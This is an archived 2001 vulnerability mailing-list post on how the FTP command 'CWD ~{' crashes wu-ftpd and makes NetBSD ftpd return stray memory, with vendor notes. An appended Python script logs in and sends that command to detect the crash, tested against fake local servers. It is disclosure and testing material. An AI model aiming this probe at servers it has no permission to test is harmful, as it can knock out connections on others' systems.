Vulnerability Development mailing list archives

Re: some ftpd implementations mishandle CWD ~{


From: Matt Power <mhpower () BOS BINDVIEW COM>
Date: Thu, 10 May 2001 00:41:50 -0400

On Wed, 2 May 2001 15:10:47 +0200, Christian Hammers <ch () WESTEND COM>
wrote:

> > ... you say that the server is DOS'able from remote...
> Or maybe it's just the one thread that crashes and the main server will handle
> other connections further on. (I haven't had time to really look at this)

Typically connections would be accepted by inetd or some other program
that has a similar role (tcpserver, xinetd, etc.).

Here are some further details about what I originally posted:

(1) wu-ftpd 2.6.1 on Linux ...
...
   behavior of server: segmentation fault ...

Some people have stated that the segmentation fault in wu-ftpd is due
to dereferencing a NULL pointer. This might be true in some
environments, but on (for example) Red Hat 6.1 Linux, the segmentation
fault is due to a call to munmap with a specific non-zero address that
happens to not refer to a valid memory location. In general, at the
application level, the problem occurs because free is called with an
incorrect argument. This is a non-zero argument in the Linux case.

I've also been asked about when the code that leads to the
segmentation fault (i.e., the "blkfree(&globlist[1])" code) was added
to the ftpd. It was added in between wu-ftpd-2.4.2-beta-13 and
wu-ftpd-2.4.2-beta-14. The change might be related to this section in
the FIXES-2.4.2-BETA-14 file:

  "contains a number of fixes for various memory leaks in the glob
  routines as well as some logic problem in the processing of the
  ABOR verb"

(2) NetBSD 1.5T ...
...
   ftpd banner:
   220 hostname FTP server (NetBSD-ftpd 20010329) ready.
...
   Off hand, it looks like the server is responding with data from an
   inappropriate memory location. ...

vendor response:

     As of 2001/04/17, (ftpd version string "20010417a"), NetBSD's
     ftpd doesn't use glob(3) for explicit ~ processing in pathnames,
     so it's not vulnerable to this particular attack.

There isn't any ftpd for which I've found an exploit by which the
"CWD ~{" behavior can be leveraged to allow execution of significantly
undesirable code.

Still the same, and I haven't heard of anyone else finding an exploit.

Matt Power
BindView Corporation, RAZOR Team
mhpower () bos bindview com
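Added example, not code from Matt Power's post or from any of the ftpd projects mentioned: a small Python probe that logs in, sends "CWD ~{" and reports whether the server answered at all or silently dropped the connection, which is what a client sees when the per-connection ftpd child dies while inetd/xinetd/tcpserver keeps accepting new connections. The two fake servers are constructed stand-ins so the probe runs offline; the target host, port, the anonymous credentials and the fake servers' behaviour are assumptions, not details from the thread.

```python
"""Probe an FTP server for the "CWD ~{" connection drop discussed in the thread.

Added example (not from the original post).  Assumed: the target allows
anonymous login.  fake_ftpd() is a constructed stand-in for testing offline.
"""
import socket
import threading


def _read_reply(f):
    """Read one FTP reply (single- or multi-line). Return (code, text), or None on EOF.

    A non-numeric code is returned as 0 so that garbage from a misbehaving
    server (the NetBSD symptom in the thread) is reported rather than crashing us.
    """
    line = f.readline()
    if not line:
        return None
    code = line[:3]
    text = line.decode(errors="replace")
    if len(line) > 3 and line[3:4] == b"-":       # "123-..." continues until "123 "
        while True:
            more = f.readline()
            if not more:
                return None
            text += more.decode(errors="replace")
            if more[:3] == code and more[3:4] == b" ":
                break
    return (int(code) if code.isdigit() else 0), text


def probe_cwd_tilde_brace(host, port, user="anonymous",
                          password="probe@example.org", timeout=5.0):
    """Log in and send CWD ~{.

    Returns ("crashed", None) if the server drops the connection without a
    reply, ("login-failed", text) if login is refused, else ("ok", text)
    where text is whatever the server replied (inspect it for garbage).
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        try:
            if _read_reply(f) is None:            # no banner at all
                return "crashed", None
            for cmd in (b"USER " + user.encode(), b"PASS " + password.encode()):
                s.sendall(cmd + b"\r\n")
                reply = _read_reply(f)
                if reply is None:
                    return "crashed", None
                if reply[0] >= 400:
                    return "login-failed", reply[1]
            s.sendall(b"CWD ~{\r\n")
            reply = _read_reply(f)
            if reply is None:
                return "crashed", None           # child died: EOF instead of a reply
            return "ok", reply[1]
        finally:
            f.close()


def fake_ftpd(crash_on_tilde_brace):
    """Constructed stand-in ftpd serving one client on 127.0.0.1. Returns (port, thread).

    With crash_on_tilde_brace=True it closes the connection on CWD ~{ with no
    reply, imitating a per-connection child that segfaults.
    """
    lsock = socket.socket()
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(1)
    port = lsock.getsockname()[1]

    def serve():
        conn, _ = lsock.accept()
        lsock.close()
        f = conn.makefile("rb")
        try:
            conn.sendall(b"220 fake FTP server (stand-in) ready.\r\n")
            while True:
                line = f.readline()
                if not line:
                    return
                verb, _, arg = line.strip().partition(b" ")
                verb = verb.upper()
                if verb == b"USER":
                    conn.sendall(b"331 Password required.\r\n")
                elif verb == b"PASS":
                    conn.sendall(b"230 Login ok.\r\n")
                elif verb == b"CWD" and arg == b"~{" and crash_on_tilde_brace:
                    return                       # "segfault": close without replying
                elif verb == b"CWD":
                    conn.sendall(b"550 " + arg + b": No such file or directory.\r\n")
                elif verb == b"QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    return
                else:
                    conn.sendall(b"502 Command not implemented.\r\n")
        finally:
            f.close()
            conn.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, t


if __name__ == "__main__":
    for crash in (True, False):
        port, _ = fake_ftpd(crash)
        print("fake ftpd (crash=%s):" % crash, probe_cwd_tilde_brace("127.0.0.1", port))
```

Run it against a real server as `probe_cwd_tilde_brace("ftp.example.org", 21)`; a "crashed" result only tells you the child that served your connection went away, so confirm with the server's own logs (a signal 11 entry from inetd/xinetd, or a core file) before calling it a denial of service.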

